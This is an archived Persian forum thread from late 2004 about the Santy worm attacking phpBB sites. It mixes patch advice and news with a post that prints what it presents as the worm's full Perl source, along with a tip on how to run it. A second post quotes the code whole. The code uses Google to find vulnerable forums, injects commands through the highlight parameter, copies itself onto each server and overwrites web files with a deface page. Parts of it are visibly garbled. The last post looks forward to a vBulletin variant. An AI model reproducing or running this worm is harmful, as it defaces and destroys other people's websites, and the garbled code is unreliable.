ابتلا به يك worm از طریق phpbb

ehsan · 23 دسامبر 2004

ظاهرا worm جدیدی سایتهای phpbb رو هدف خودش قرارداده و از طریق این سایتها، اقدام به Deface کردن سایت می کنه. خلاصه اگه phpbb دارد حتما اون رو upgrade کنید.
اطلاعات بیشتر درباره این خبر:
http://news.bbc.co.uk/1/hi/technology/4117711.stm

راه حل مقابله با این ویروس:
ارتقا نسخه php به یکی از آخرین نسخه ها... 4.3.10 و یا 5.0.3 البته ظاهرا phpbb هنوز با php 5 مشکل داره.
اطلاعات بیشتر:
http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=248046

افرادی که روی Shared Hosting هستند و حتی از phpbb استفاده نمیکنند ممکنه به این worm مبتلا بشند و در سایت و صفحات سایتشون تغییرات ناخواسته ایجاد کنه. لازمه که کلیه فایلهای php و asp و htm یا html خودشون رو روی پرمیشن 644 قرار دهند.

mehrdad1355 · 23 دسامبر 2004

به گفته‌ي كارشناسان امور امنيتي، به تازگي يك كرم اينترنتي با استفاده از موتور جستجوي گوگل، قرباني‌هاي خود را پيدا مي‌كند.

كرم اينترنتي Santy، از طريق برنامه‌ي phpBB (سرنام PHP Bulletin Board) كه يكي از معروف‌ترين برنامه‌هاي قابل استفاده در فروم‌ها است، انتشار مي‌يابد. طبق تحقيقات به عمل آمده، اين كرم اينترنتي، براي يافتن سايت‌هايي كه از برنامه‌ي مذكور استفاده مي‌كنند، از موتور جستجوي گوگل بهره مي‌برد.
طبق اخبار منتشره، اين كرم تاكنون 40000 سايت اينترنتي در سرتاسر دنيا را آلوده كرده و پيش بيني مي‌شود در روز‌هاي آينده، سايت‌هاي بيشتري مورد هجوم قرار بگيرند.
اين كرم، بعد از نفوذ به سايت قرباني، تمامي فايل‌هاي HTML، ASP، PHP و JSP را حذف و فايلي با متن This site is defaced!!! This site is defaced!!! NeverEverNoSanity WebWorm generation X
را جايگزين آنها مي‌نمايد. طبق اعلام نظر كارشناسان شركت Kaspersky (يكي از شركت‌هاي فعال در زمينه‌ي توليد برنامه‌هاي ضد ويروس) تا كنون 24 گونه‌ي مختلف از اين كرم شناسايي شده‌اند و به نظر مي‌رسد در حال حاضر، بهترين راه مقابله با انتشار اين كرم اينترنتي، بروزرساني برنامه‌ي phpBB است.
مسولان گوگل تا كنون در اين باره اظهار نظري نكردند و ساعاتي پيش سخنگوي اين شركت گفت كه در حال حاضر، كارشناسان شركت در حال بررسي اطلاعات جمع‌آوري شده‌اند و بزودي نتايج بررسي‌هاي خود را در اختيار كاربران قرار خواهند داد.

mehrdad1355 · 23 دسامبر 2004

راستی دیروز سایت ایرونی کید همینطوری دیفیس شده بود ولی سرورش با ری استور بک اپ درستش کرد

amir abbas · 23 دسامبر 2004

درسته
اسم این کرم santy هستش که از عصر سه شنبه تا حالا نزدیک به 50 هزار سایت رو از کار انداخته
همه شرکت های آنتی ویروس بسیج شدن که جلوشو بگیرن

این سورس همون کرم هستش

کد:

#
# Santy.A - phpBB <= 2.0.10 Web Worm Source Code (Proof of Concept)
# -SECU For educational purpose
#
# See : http://isc.sans.org/diary.php?date=2004-12-21
# http://www.f-secure.com/v-descs/santy_a.shtml
#
#!/usr/bin/perl
use
strict;
use Socket;

sub PayLoad();
sub DoDir($);
sub DoFile ($);
sub GoGoogle();

sub GrabURL($);
sub str2chr($);

eval{ fork and exit; };

my $generation = x;
PayLoad() if $generation > 3;

open IN, $0 or exit;
my $self = join '', <IN>;
close IN;
unlink $0;

while(!GrabURL('http://www.google.com/advanced_search')) {
if($generation > 3)
{
PayLoad() ;
} else {
exit;
}
}

$self =~ s/my \$generation = (\d+);/'my $generation = ' . ($1 + 1) . ';'/e;

my $selfFileName = 'm1ho2of';
my $markStr = 'HYv9po4z3jjHWanN';
my $perlOpen = 'perl -e "open OUT,q(>' . $selfFileName . ') and print q(' . $markStr . ')"';
my $tryCode = '&highlight=%2527%252Esystem(' . str2chr($perlOpen) . ')%252e%2527';

while(1) {
exit if -e 'stop.it';

OUTER: for my $url (GoGoogle()) {

exit if -e 'stop.it';

$url =~ s/&highlight=.*$//;
$url .= $tryCode;
my $r = GrabURL($url);
next unless defined $r;
next unless $r =~ /$markStr/;

while($self =~ /(.{1,20})/gs) {
my $portion = '&highlight=%2527%252Efwrite(fopen(' . str2chr($selfFileName) . ',' . str2chr('a') . '),
' . str2chr($1) . '),exit%252e%2527';

$url =~ s/&highlight=.*$//;
$url .= $portion;

next OUTER unless GrabURL($url);
}

my $syst = '&highlight=%2527%252Esystem(' . str2chr('perl ' . $selfFileName) . ')%252e%2527';
$url =~ s/&highlight=.*$//;
$url .= $syst;

GrabURL($url);
}
}



sub str2chr($) {
my $s = shift;

$s =~ s/(.)/'chr(' . or d($1) . ')%252e'/seg;
$s =~ s/%252e$//;

return $s;
}


sub GoGoogle() {
my @urls;
my @ts = qw/t p topic/;
my $startURL = 'http://www.google.com/search?num=100&hl=en&lr=&as_qdr=all' . '&
q=allinurl%3A+%22viewtopic.php%22+%22' . $ts[int(rand(@ts))] . '%3D' . int(rand(30000)) .
'%22&btnG=Search';
my $goo1st = GrabURL($startURL)
fined $goo1st;
my $allGoo = $goo1st;
my $r = '<td><a href=(/search\?q=.+?)' . '><img src=/nav_page\.gif width=16 height=26
alt="" border=0><br>\d+</a>';
while($goo1st =~ m#$r#g) {
$allGoo . = GrabURL('www.google.com' . $1);
}
while($allGoo =~ m#href=(http://\S+viewtopic.php\S+)#g) {
my $u = $1;
next if $u =~ m#http://.*http://#i; # no redirects
push(@urls, $u);
}

return @urls;
}


sub GrabURL($) {
my $url = shift;
$url =~ s#^http://##i;

my ($host, $res) = $url =~ m#^(.+?)(/.*)#;
return unless defined($host) && defined($res);

my $r =
"GET $resHTTP/1.0\015\012" .
"Host: $host\015\012" .
"Accept:*/*\015\012" .
"Accept-Language: en-us,en-gb;q=0.7,en;q=0.3\015\012" .
"Pragma: no-cache\015\012" .
"Cache-Control: no-cache\015\012" .
"Referer: http://" . $host . $res . "\015\012" .

"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\015\012" .
"Connection: close\015\012\015\012";

my $port = 80;
if($host =~ /(.*)sad.gif\d+)$/){ $host = $1; $port = $2;}

my $internet_addr = inet_aton($host) or return;
socket(Server, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or return;
setsockopt(Server, SOL_SOCKET, SO_RCVTIMEO, 10000);

connect(Server, sockaddr_in($port, $internet_addr)) or return;
select((select(Server), $| = 1)[0]);
print Server $r;

my $answer = join '', <Server>;
close (Server);

return $answer;
}


sub DoFile($) {
my $s = q{
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD><TITLE>This site is defaced!!!</TITLE></HEAD>
<BODY bgcolor="#000000" text="#FF0000">
<H1>This site is defaced!!!</H1>
<HR><ADDRESS><b>NeverEverNoSanity WebWorm generation }
. $generation .q{.</b></ADDRESS>
</BODY></HTML>
};

unlink $_[0];
open OUT, ">$_[0]" or return;
print OUT $s;
close OUT;
}


sub DoDir($) {

my $dir = $_[0];
$dir .= '/' unless $dir =~ m#/$#;

local *DIR;
opendir DIR, $dir or return;

for my $ent (grep { $_ ne '.' and $_ ne '..' } readdir DIR) {

unless(-l $dir . $ent) {
if(-d _) {
DoDir($dir . $ent);
next;
}
}

if($ent =~ /\.htm/i or $ent =~ /\.php/i or $ent =~ /\.asp/i or $ent =~ /\.shtm/i or $ent =~ /\.jsp/i
or $ent =~ /\.phtm/i) {
DoFile($dir . $ent);
}
}

closedir DIR;
}


sub Pay Load() {

my @dirs;


eval{
while(my @a = getpwent()) { push(@dirs, $a[7]);}
};

push(@dirs, '/ ');

for my $l ('A' .. 'Z') {
push(@d
for my $d (@dirs) {
DoDir($d);
}
}

برای کامپایل کردنش هم باید توی یک فایل متنی ذخیره کنیدش و پسوند فایل رو به pl تغییر بدید البته باید active perl داشته باشید

davidmors · 24 دسامبر 2004

به نقل از amir abbas :

درسته
اسم این کرم santy هستش که از عصر سه شنبه تا حالا نزدیک به 50 هزار سایت رو از کار انداخته
همه شرکت های آنتی ویروس بسیج شدن که جلوشو بگیرن

این سورس همون کرم هستش

کد:

#
# Santy.A - phpBB <= 2.0.10 Web Worm Source Code (Proof of Concept)
# -SECU For educational purpose
#
# See : http://isc.sans.org/diary.php?date=2004-12-21
# http://www.f-secure.com/v-descs/santy_a.shtml
#
#!/usr/bin/perl
use
strict;
use Socket;

sub PayLoad();
sub DoDir($);
sub DoFile ($);
sub GoGoogle();

sub GrabURL($);
sub str2chr($);

eval{ fork and exit; };

my $generation = x;
PayLoad() if $generation > 3;

open IN, $0 or exit;
my $self = join '', <IN>;
close IN;
unlink $0;

while(!GrabURL('http://www.google.com/advanced_search')) {
if($generation > 3)
{
PayLoad() ;
} else {
exit;
}
}

$self =~ s/my \$generation = (\d+);/'my $generation = ' . ($1 + 1) . ';'/e;

my $selfFileName = 'm1ho2of';
my $markStr = 'HYv9po4z3jjHWanN';
my $perlOpen = 'perl -e "open OUT,q(>' . $selfFileName . ') and print q(' . $markStr . ')"';
my $tryCode = '&highlight=%2527%252Esystem(' . str2chr($perlOpen) . ')%252e%2527';

while(1) {
exit if -e 'stop.it';

OUTER: for my $url (GoGoogle()) {

exit if -e 'stop.it';

$url =~ s/&highlight=.*$//;
$url .= $tryCode;
my $r = GrabURL($url);
next unless defined $r;
next unless $r =~ /$markStr/;

while($self =~ /(.{1,20})/gs) {
my $portion = '&highlight=%2527%252Efwrite(fopen(' . str2chr($selfFileName) . ',' . str2chr('a') . '),
' . str2chr($1) . '),exit%252e%2527';

$url =~ s/&highlight=.*$//;
$url .= $portion;

next OUTER unless GrabURL($url);
}

my $syst = '&highlight=%2527%252Esystem(' . str2chr('perl ' . $selfFileName) . ')%252e%2527';
$url =~ s/&highlight=.*$//;
$url .= $syst;

GrabURL($url);
}
}



sub str2chr($) {
my $s = shift;

$s =~ s/(.)/'chr(' . or d($1) . ')%252e'/seg;
$s =~ s/%252e$//;

return $s;
}


sub GoGoogle() {
my @urls;
my @ts = qw/t p topic/;
my $startURL = 'http://www.google.com/search?num=100&hl=en&lr=&as_qdr=all' . '&
q=allinurl%3A+%22viewtopic.php%22+%22' . $ts[int(rand(@ts))] . '%3D' . int(rand(30000)) .
'%22&btnG=Search';
my $goo1st = GrabURL($startURL)
fined $goo1st;
my $allGoo = $goo1st;
my $r = '<td><a href=(/search\?q=.+?)' . '><img src=/nav_page\.gif width=16 height=26
alt="" border=0><br>\d+</a>';
while($goo1st =~ m#$r#g) {
$allGoo . = GrabURL('www.google.com' . $1);
}
while($allGoo =~ m#href=(http://\S+viewtopic.php\S+)#g) {
my $u = $1;
next if $u =~ m#http://.*http://#i; # no redirects
push(@urls, $u);
}

return @urls;
}


sub GrabURL($) {
my $url = shift;
$url =~ s#^http://##i;

my ($host, $res) = $url =~ m#^(.+?)(/.*)#;
return unless defined($host) && defined($res);

my $r =
"GET $resHTTP/1.0\015\012" .
"Host: $host\015\012" .
"Accept:*/*\015\012" .
"Accept-Language: en-us,en-gb;q=0.7,en;q=0.3\015\012" .
"Pragma: no-cache\015\012" .
"Cache-Control: no-cache\015\012" .
"Referer: http://" . $host . $res . "\015\012" .

"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\015\012" .
"Connection: close\015\012\015\012";

my $port = 80;
if($host =~ /(.*)sad.gif\d+)$/){ $host = $1; $port = $2;}

my $internet_addr = inet_aton($host) or return;
socket(Server, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or return;
setsockopt(Server, SOL_SOCKET, SO_RCVTIMEO, 10000);

connect(Server, sockaddr_in($port, $internet_addr)) or return;
select((select(Server), $| = 1)[0]);
print Server $r;

my $answer = join '', <Server>;
close (Server);

return $answer;
}


sub DoFile($) {
my $s = q{
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD><TITLE>This site is defaced!!!</TITLE></HEAD>
<BODY bgcolor="#000000" text="#FF0000">
<H1>This site is defaced!!!</H1>
<HR><ADDRESS><b>NeverEverNoSanity WebWorm generation }
. $generation .q{.</b></ADDRESS>
</BODY></HTML>
};

unlink $_[0];
open OUT, ">$_[0]" or return;
print OUT $s;
close OUT;
}


sub DoDir($) {

my $dir = $_[0];
$dir .= '/' unless $dir =~ m#/$#;

local *DIR;
opendir DIR, $dir or return;

for my $ent (grep { $_ ne '.' and $_ ne '..' } readdir DIR) {

unless(-l $dir . $ent) {
if(-d _) {
DoDir($dir . $ent);
next;
}
}

if($ent =~ /\.htm/i or $ent =~ /\.php/i or $ent =~ /\.asp/i or $ent =~ /\.shtm/i or $ent =~ /\.jsp/i
or $ent =~ /\.phtm/i) {
DoFile($dir . $ent);
}
}

closedir DIR;
}


sub Pay Load() {

my @dirs;


eval{
while(my @a = getpwent()) { push(@dirs, $a[7]);}
};

push(@dirs, '/ ');

for my $l ('A' .. 'Z') {
push(@d
for my $d (@dirs) {
DoDir($d);
}
}

برای کامپایل کردنش هم باید توی یک فایل متنی ذخیره کنیدش و پسوند فایل رو به pl تغییر بدید البته باید active perl داشته باشید

بابا مخ
بابا اطلاعات
موندم تو كف
ايول

Azemati · 24 دسامبر 2004

اين كرم سايت‌هاي phpbb رو چه جوري پيدا مي كنه!؟ خود به خود؟
يا بايد يكي خودش كرم بريزه؟

ehsan · 24 دسامبر 2004

به نقل از azemati :
اين كرم سايت‌هاي phpbb رو چه جوري پيدا مي كنه!؟ خود به خود؟
يا بايد يكي خودش كرم بريزه؟

با استفاده از گوگل... توی اون لینکها و مطلب مهرداد یه توضحاتی نوشته. که برای نسخه های upgrade نشده search میکنن
حتما باید phpbb خود رو به آخرین نسخه upgrade کنید.

artin · 24 دسامبر 2004

phpBB 2.0.11
حتما به این نسخه اپگرید کنید

artin · 26 دسامبر 2004

آخرین ورژن پی اپ پی بی بی هم حک شد
http://www.securityfocus.com/archive/1/385465/2004-12-22/2004-12-28/0

mehrdad1355 · 26 دسامبر 2004

:lol: :lol: :lol: :lol: :lol:
می گم چرا سایت عابر بسته هست

sina1808 · 28 دسامبر 2004

پهناي باند تموم كرده ديگه !

Azemati · 28 دسامبر 2004

http://news.tarashe.com/categories/security/002518.shtml

سانتی گوگل به یاهو و AOL نیز حمله کرد!

چند روز پس از آنکه ویروس سانتی، گوگل را هدف قرار داد و از آن بعنوان یافتن سرورهای وب آسیب پذیر استفاده کرد، کارشناسان امنیتی اخطار داده‌اند که نمونه‌های جدید این ویروس در تدارک حمله‌ای گسترده نه تنها بسوی گوگل بلکه به سوی سایر موتورهای جستجو هستند.

به گزارش بخش خبر تراشه ...

mehrdad1355 · 28 دسامبر 2004

نه بابا قبل اون هم یه پیام فارسی رو سایت بود که سایت فعلا تعطیله الان که اصلا نمی یاد و ظاهراه عابر تموم کرده(البته پهنای باندو)!!
یه دوماهی هست که این عابر(سایتش) قاطی داره و تق و لقه!!

4shir · 6 ژانویه 2005

سلام بابا كلي خنديدم

ببينيد اين كرم با سرچ كردن عبارت
http://\S+viewtopic.php\S+)#g
يك چيزي مثل اين در گوگل به پيدا كردن هاستهاي كه اين فايل رو دارن ميكگنه و بعد با استفاده از باگي كه يك ماه پيش براي اين فايل اومده بود شروع بع اكسپوليت كردن و بعد ديفيس كردن سايت ميكنه نه تنها بي بي بلكه ipb و vb رو هم هك كرده ميگيد نه بريد توي سايت من يا سايت مجيد تاپيكش هست ليست سايتهاي رو كه زده ميتونيد ببينيد كه از چه برنامه هاي استفاده كرده بودن و سايتشون هك شده بعدش هم شما با پتچ كردن ميتونستيد جلوي اين كرم رو بگيريد و نيازي به اپگريد نبود سوم نسخه 11 هنوز اكسپوليتش رسما منتشر نشده به سورت زيرزميني هست ولي باگ خيلي جالبي داره نسخه VB هم كه باگش پابليك شد امروز فرداست كه با دستكاري سورس همين ورم يك مرم هم براي vbبياد كه خفن حال كنيم

ابتلا به يك worm از طریق phpbb

ehsan

Administrator

mehrdad1355

کاربر قدیمی پرشین تولز

mehrdad1355

کاربر قدیمی پرشین تولز

amir abbas

Registered User

davidmors

مدیر بازنشسته

Azemati

کاربر فعال

ehsan

Administrator

artin

کاربر تازه وارد

artin

کاربر تازه وارد

mehrdad1355

کاربر قدیمی پرشین تولز

sina1808

Registered User

Azemati

کاربر فعال

mehrdad1355

کاربر قدیمی پرشین تولز

4shir

کاربر تازه وارد

بک‌لینک